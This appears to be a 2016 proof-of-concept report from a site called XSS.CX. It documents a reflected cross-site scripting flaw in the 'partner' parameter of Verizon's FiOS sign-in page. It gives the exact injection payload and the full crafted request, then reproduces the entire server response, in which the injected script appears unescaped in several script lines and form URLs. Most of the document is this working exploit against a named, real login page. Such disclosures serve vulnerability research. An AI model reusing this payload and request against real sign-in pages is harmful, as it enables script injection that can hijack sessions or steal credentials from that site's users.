XSS.CX Home | Blog | XSS Filter Evasion
XSS, Javascript Injection, Partner Parameter, signin.verizon.com
XSS Proof of Concept by XSS.Cx
|
Target URL
|
High
|
Medium
|
Low
|
Info
|
| Report | 1 | 5 | 1 | 1 |
| XSS - Javascript Injection | Cross Site Scripting |
Confidence: |
Certain |
| Host: |
https://signin.verizon.com |
| Path: |
/sso/VOLPortalLogin |
Issue detail
The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ";alert(1)// was submitted in the partner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request 1
GET /sso/VOLPortalLogin?partner=hgtv80202"%3balert(1)%2f%2f188 HTTP/1.1
Host: signin.verizon.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Response 1
HTTP/1.1 200 OK
Date: Wed, 24 Feb 2016 03:08:24 GMT
Server: Apache
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: VZSSOCOM_SESSIONID=xsscx; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/p3p/w3c/p3p.xml", CP="CAO DSP COR CUR ADM TAI PSD IVAi IVDi OTPi OTRi STP PHY ONL UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20084
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Verizon FiOS - sign in</title>
<script type="text/javascript" src="//nexus.ensighten.com/verizon/Bootstrap.js"></script>
<meta name="description" content="">
<!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame -->
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="/sso/resources/css/tvzipcode/vzrf.css" rel="stylesheet" />
<link href="/sso/resources/css/tvzipcode/app.css" rel="stylesheet" />
<!--[if IE 9]>
<link href="/sso/resources/css/tvzipcode/vzrf-oldie2.css" rel="stylesheet" />
<link href="/sso/resources/css/tvzipcode/vzrf-oldie3.css" rel="stylesheet" />
<![endif]-->
<!-- JavaScript plugins (requires jQuery) -->
<script src="/sso/resources/js/tvonline/jquery.js"></script>
<script type="text/javascript">
function Validate() {
var theUsername = document.tvlogin.IDToken1.value;
var thePassword = document.tvlogin.IDToken2.value;
var theZipcode;
if(document.getElementById('zipcode-txt')) {
theZipcode = document.tvlogin.zipcode.value;
}
// scLinkTrack('prop11=sso| tve| signin| signin^prop27=signin^prop37=sso| tve| signin');
scLinkTrackID('signin');
if(theUsername == '' || theUsername == null) {
document.getElementById('IDToken1').focus();
if(!($("#IDToken1").hasClass("error"))) $("#IDToken1").addClass("error");
$("#IDToken2").removeClass("error");
document.getElementById('uidAlert1').style.display='block';
document.getElementById('uidAlert2').style.display='none';
document.getElementById('uidAlert3').style.display='none';
document.getElementById('loginAlert').style.display='none';
if(document.getElementById('zipcode-txt')) {
document.getElementById('zipAlert').style.display='none';
if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");
}
return false;
}
else if(theUsername.length > 60) {
document.getElementById('IDToken1').focus();
if(!($("#IDToken1").hasClass("error"))) $("#IDToken1").addClass("error");
$("#IDToken2").removeClass("error");
document.getElementById('uidAlert1').style.display='none';
document.getElementById('uidAlert2').style.display='block';
document.getElementById('uidAlert3').style.display='none';
document.getElementById('loginAlert').style.display='none';
if(document.getElementById('zipcode-txt')) {
document.getElementById('zipAlert').style.display='none';
if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");
}
return false;
}
else if(!(/^[A-Za-z0-9_@'.+-]*$/.test(theUsername))) {
document.getElementById('IDToken1').focus();
if(!($("#IDToken1").hasClass("error"))) $("#IDToken1").addClass("error");
$("#IDToken2").removeClass("error");
document.getElementById('uidAlert1').style.display='none';
document.getElementById('uidAlert2').style.display='none';
document.getElementById('uidAlert3').style.display='block';
document.getElementById('loginAlert').style.display='none';
if(document.getElementById('zipcode-txt')) {
document.getElementById('zipAlert').style.display='none';
if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");
}
return false;
}
else if(thePassword.length < 1) {
document.getElementById('IDToken2').focus();
if(!($("#IDToken2").hasClass("error"))) $("#IDToken2").addClass("error");
$("#IDToken1").removeClass("error");
document.getElementById('pwdAlert1').style.display='block';
document.getElementById('pwdAlert2').style.display='none';
document.getElementById('pwdAlert3').style.display='none';
document.getElementById('uidAlert1').style.display='none';
document.getElementById('uidAlert2').style.display='none';
document.getElementById('uidAlert3').style.display='none';
document.getElementById('loginAlert').style.display='none';
if(document.getElementById('zipcode-txt')) {
document.getElementById('zipAlert').style.display='none';
if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");
}
return false;
}
else if(thePassword.length < 6) {
document.getElementById('IDToken2').focus();
if(!($("#IDToken2").hasClass("error"))) $("#IDToken2").addClass("error");
$("#IDToken1").removeClass("error");
document.getElementById('pwdAlert1').style.display='none';
document.getElementById('pwdAlert2').style.display='block';
document.getElementById('pwdAlert3').style.display='none';
document.getElementById('uidAlert1').style.display='none';
document.getElementById('uidAlert2').style.display='none';
document.getElementById('uidAlert3').style.display='none';
document.getElementById('loginAlert').style.display='none';
if(document.getElementById('zipcode-txt')) {
document.getElementById('zipAlert').style.display='none';
if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");
}
return false;
}
else if(thePassword.length > 24) {
document.getElementById('IDToken2').focus();
if(!($("#IDToken2").hasClass("error"))) $("#IDToken2").addClass("error");
$("#IDToken1").removeClass("error");
document.getElementById('pwdAlert1').style.display='none';
document.getElementById('pwdAlert2').style.display='none';
document.getElementById('pwdAlert3').style.display='block';
document.getElementById('uidAlert1').style.display='none';
document.getElementById('uidAlert2').style.display='none';
document.getElementById('uidAlert3').style.display='none';
document.getElementById('loginAlert').style.display='none';
if(document.getElementById('zipcode-txt')) {
document.getElementById('zipAlert').style.display='none';
if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").removeClass("error");
}
return false;
}
else if(document.getElementById('zipcode-txt')) {
if(theZipcode.length == 0 || theZipcode.length < 5 || !/(^\d{5}$)|(^\d{5}-\d{4}$)/.test(theZipcode)) {
if(!($("#zipcode-txt").hasClass("error"))) $("#zipcode-txt").addClass("error");
$("#IDToken1").removeClass("error");
$("#IDToken2").removeClass("error");
document.getElementById('zipcode-txt').focus();
document.getElementById('pwdAlert1').style.display='none';
document.getElementById('pwdAlert2').style.display='none';
document.getElementById('pwdAlert3').style.display='none';
document.getElementById('uidAlert1').style.display='none';
document.getElementById('uidAlert2').style.display='none';
document.getElementById('uidAlert3').style.display='none';
document.getElementById('loginAlert').style.display='none';
document.getElementById('zipAlert').style.display='block';
return false;
}
}
//document.getElementById('tvloginsignin').click();
document.tvlogin.submit();
return false;
}
function putFocus() {
if(document.getElementById('zipcode-txt')) {
document.getElementById('zipcode-txt').focus();
} else if(document.tvlogin != null){
document.tvlogin.IDToken1.focus();
}
}
function showInputError(errorMsg) {
/*document.getElementById('userid').className='col-sm-5 col-lg-6 error';
document.getElementById('passwd').className='col-sm-5 col-lg-6 error';*/
document.getElementById('errormsgtxt').style.display='block';
document.getElementById("errormsgtxt").innerHTML=errorMsg;
}
function ClickCancel() {
scLinkTrackID('cancel');
window.location='https://sp.auth.adobe.com/adobe-services/1.0/session?cancelled=1&_method=POST&mso_id=Verizon&redirect_url=http%3A%2F%2Fwatch.hgtv.com%2Factivate%2Fthanks.html%23Roku%26HGTV';
}
function clear_fields() {
for( var n = 0; n < document.forms.length; n++ ) {
for(var i = 0; i < document.forms[n].elements.length; i++) {
if( document.forms[n].elements[i].type == 'text') {
document.forms[n].elements[i].value = '';
}
if( document.forms[n].elements[i].type == 'password') {
document.forms[n].elements[i].value = '';
}
}
}
}
function NewCustomer() {
scLinkTrackID('not vz ec');
window.location='http://www.verizon.com/';
}
function RegisterUser() {
scLinkTrackID('reg new acct');
window.location='https://myverizonid.verizon.com/accessmanager/public/c/reg/start?choose=y&goto=https%3A%2F%2Fwww.verizon.com%2FForYourHome%2Fmyaccount%2Fngen%2Fpr%2Fhome%2Fmyverizon.aspx%3Freferrer%3Dregister';
}
function forgotSC() {
scLinkTrackID('forgot un+pw');
}
function PrivacyPolicy() {
scLinkTrackID('privacy');
document.location.href='http://www.verizon.com/privacy/';
}
function OrderFios() {
window.location='http://www.verizon.com/foryourhome/goflow/nationalbundles/bundlequalify.aspx';
}
function OrderPartner() {
window.location='https://www.verizon.com/ForYourHome/GoFlow/MyVerizonnew/acslogin.aspx?FlowRoute=URC_UPGRADE&URCSOURCE=tve_generic';
}
$("#tvlogin").keypress(function(event) {
if(event.which == 13){
Validate();
}
});
function activateChannel() {
var xmlHttp;
try
{
// Firefox, Opera 8.0+, Safari
xmlHttp=new XMLHttpRequest();
}
catch (e)
{
// Internet Explorer
try
{
xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
}
catch (e)
{
try
{
xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
}
catch (e)
{
alert("Your browser does not support AJAX!");
}
}
}
xmlHttp.onreadystatechange=function()
{
if(xmlHttp.readyState==4)
{
//Submit the form to the TV Partner with SAML Response
$("form[name='cpsubmitter']").attr('method', 'post');
$("form[name='cpsubmitter']").attr('action', 'null');
if("_top" == 'null') {
$("form[name='cpsubmitter']").attr('target', 'null');
}
$("input[name='SAMLResponse']").val('null');
$("input[name='RelayState']").val('_00e50d14-1689-4eb7-b6f0-b40c58c6b19b');
$("input[name='targetValue']").val('null');
$("form[name='cpsubmitter']").submit();
}
}
xmlHttp.open("POST", "https://signin.verizon.com/sso/TVPActivationServlet?shadowisoc=null", true);
xmlHttp.setRequestHeader('Content-Type','text/html');
xmlHttp.send(null);
}
$("#tvactivation").keypress(function(event) {
if(event.which == 13){
activateChannel();
}
});
</script>
</head>
<body onLoad="putFocus();">
<!-- Start for Site Catalyst -->
<script type="text/javascript">
var s_account="verizontelecomglobal,verizontelecomsso";
</script>
<script language="javascript" src="//www.verizon.com/includes/javascript/omnicode.js"></script>
<script type="text/javascript">
if(typeof (s_837) != "undefined") {
var error = "null";
var partner = "hgtv";alert(1)//";
if(error != null && error == "SAM"){
s_837.simplepageName="tve| signin| error| incorrect uid pwd";
s_837.detailpageName="tve| signin| error| incorrect uid pwd| hgtv80202";alert(1)//188";
} else if(error != null && error == "NOTENTITLEDUSER"){
s_837.simplepageName="tve| signin| error| notentitled";
s_837.detailpageName="tve| signin| error| notentitled| hgtv80202";alert(1)//188";
} else if(error != null && error == "NOTFiOSTVUSER"){
s_837.simplepageName="tve| signin| error| notfios";
s_837.detailpageName="tve| signin| error| notfios| hgtv80202";alert(1)//188";
} else if(error != null && error == "MAINTENANCE"){
s_837.simplepageName="tve| signin| error| maintenance";
s_837.detailpageName="tve| signin| error| maintenance| hgtv80202";alert(1)//188";
} else {
s_837.simplepageName="tve| signin";
s_837.detailpageName="tve| signin| hgtv80202";alert(1)//188";
}
s_837.pfxID="sso";
s_837.prop2="res myverizon";
s_837.prop3="tve sso";
s_837.prop4="/vz/residential/myverizon/tve/sso";
s_837.prop6="myverizon";
s_837.prop40="res| sso iframe";
s_837.prop48="tve";
if(error != null && error != "" && error != "null") {
s_837.events="event21";
} else {
s_837.events="";
}
}
</script>
<script type="text/javascript" language="javascript">
var s_code=s_837.t();if(s_code)document.write(s_code);
</script>
<!-- End for Site Catalyst -->
<section>
<main class="main
tiny-12 small-10 large-5
border-all border-grey-5 border-all-large
padding-top-small margin-top-small padding-bottom-tiny
large-narrow">
<!-- ## Header -->
<div class="row">
<div class="tiny-12 large-6 columns">
<img src="/sso/resources/images/tvzipcode/vzlogo_med.png" alt="Verizon FiOS" title="Verizon FiOS" class="mw-medium tiny-12">
</div>
</div>
<div class="row" style="display:block">
<div class="columns">
<p class="text-large padding-top-small">Sign in with your Verizon Residential account info.</p>
</div>
<!-- Server login error messages -->
<div class="columns">
<div class="error-msg padding-top-small" id="loginAlert" >We're sorry, but either the User ID or Password entered is not correct. Please try again.</div>
</div>
<div class=" columns">
<!-- ## Form -->
<form data-parsley-validate="" novalidate name="tvlogin" method="post" autocomplete="off" action="https://auth.verizon.com/amserver/UI/Login?realm=dotcom&module=AIAW&goto=https://signin.verizon.com/sso/choice/tvpHandler.jsp?loginType%3DvzRedirect%26partner%3Dhgtv80202%22%3Balert%281%29%2F%2F188%26partnerlogo%3Dnull%26RelayState%3D_00e50d14-1689-4eb7-b6f0-b40c58c6b19b%26cancelURL%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fadobe-services%252F1.0%252Fsession%253Fcancelled%253D1%2526_method%253DPOST%2526mso_id%253DVerizon%2526redirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV%26TARGET%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fsp%252Fsaml%252FSAMLAssertionConsumer%253Fredirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV&clientId=TvLogin&partner=hgtv80202";alert(1)//188&errorURL=https://signin.verizon.com/sso/VOLPortalLogin?src%3DSAM%26loginType%3DvzRedirect%26partner%3Dhgtv80202%22%3Balert%281%29%2F%2F188%26partnerlogo%3Dnull%26RelayState%3D_00e50d14-1689-4eb7-b6f0-b40c58c6b19b%26cancelURL%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fadobe-services%252F1.0%252Fsession%253Fcancelled%253D1%2526_method%253DPOST%2526mso_id%253DVerizon%2526redirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV%26TARGET%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fsp%252Fsaml%252FSAMLAssertionConsumer%253Fredirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV">
<input type="hidden" name="cookiedomain" id="cookiedomain" value=".verizon.com" />
<input type="hidden" name="amLoginUrl" value="https://auth.verizon.com/amserver/UI/Login?realm=dotcom&module=AIAW&goto=https://signin.verizon.com/sso/choice/tvpHandler.jsp?loginType%3DvzRedirect%26partner%3Dhgtv80202%22%3Balert%281%29%2F%2F188%26partnerlogo%3Dnull%26RelayState%3D_00e50d14-1689-4eb7-b6f0-b40c58c6b19b%26cancelURL%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fadobe-services%252F1.0%252Fsession%253Fcancelled%253D1%2526_method%253DPOST%2526mso_id%253DVerizon%2526redirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV%26TARGET%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fsp%252Fsaml%252FSAMLAssertionConsumer%253Fredirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV&clientId=TvLogin&partner=hgtv80202";alert(1)//188&errorURL=https://signin.verizon.com/sso/VOLPortalLogin?src%3DSAM%26loginType%3DvzRedirect%26partner%3Dhgtv80202%22%3Balert%281%29%2F%2F188%26partnerlogo%3Dnull%26RelayState%3D_00e50d14-1689-4eb7-b6f0-b40c58c6b19b%26cancelURL%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fadobe-services%252F1.0%252Fsession%253Fcancelled%253D1%2526_method%253DPOST%2526mso_id%253DVerizon%2526redirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV%26TARGET%3Dhttps%253A%252F%252Fsp.auth.adobe.com%252Fsp%252Fsaml%252FSAMLAssertionConsumer%253Fredirect_url%253Dhttp%25253A%25252F%25252Fwatch.hgtv.com%25252Factivate%25252Fthanks.html%252523Roku%252526HGTV" />
<input type="hidden" name="stid" value="off" />
<input type="hidden" name="forceprofile" value="off" />
<input type="hidden" name="seclock" value="off" />
<input type="hidden" name="vzw" value ="off" >
<div class="row">
<div class="columns">
<label for="IDToken1" class="hide-for-small-down">User ID</label>
<input type="text" id="IDToken1" name="IDToken1" class="" autocomplete="off" placeholder="User ID" value="">
<div class="error-msg" id="uidAlert1">Please enter your User ID</div>
<div class="error-msg" id="uidAlert2">Username can not be longer than 60 characters</div>
<div class="error-msg" id="uidAlert3">Please enter a User ID using letters, numbers or dots. Characters such as &, $, %, / or space may not be used.</div>
<label for="IDToken2" class="hide-for-small-down">Password</label>
<input type="Password" id="IDToken2" name="IDToken2" autocomplete="off" placeholder="Password">
<div class="error-msg" id="pwdAlert1">Please enter your Password</div>
<div class="error-msg" id="pwdAlert2">Password must contain at least 6 characters</div>
<div class="error-msg" id="pwdAlert3">Password must contain less than 24 characters</div>
<button id="tvloginsignin" class="button left signin" data-validate-form onClick="return Validate()">Sign In</button>
<a href="https://signin.verizon.com/sso/forgotflows" class="forgotpwd" data-open-modal="ForgotUserOrPassword" onClick="forgotSC()">
Forgot User ID or Password?
</a>
</div><!-- .columns -->
</div><!-- .row -->
</form>
<div class="row">
<div class="columns">
<a href="#" onClick="NewCustomer()">
Not a Verizon Customer ?
</a> <br /> <br />
<a href="#" onClick="RegisterUser()">
Register a New Account
</a> <br /> <br />
</div>
</div>
<!-- ## Big Buttons -->
<!-- div class="row">
<a href="#" class="text-white" onClick="NewCustomer()">
<div class="tiny-6 columns padding-right-zero">
<div class="panel theme-marketing">
</div>
</div>
</a>
</div-->
<!-- ## footer -->
@ 2016 Verizon
<a data-open-modal="PrivacyPolicy" href="javascript:void(0);" onClick="PrivacyPolicy()">Privacy Policy</a>
</div>
</div>
<!-- Channel Activation Section Starts -->
<div class="row actcontent" style="display:none">
</div>
<!-- Channel Activation Section Ends -->
<!-- Subscription Section Starts -->
<div class="row subcontent" style="display:none">
</div>
</main>
</section>
</body>
</html>
Proof of Concept - XSS executing in FF
Report generated by XSS.CX at Sat Mar 19 16:31:06 EDT 2016.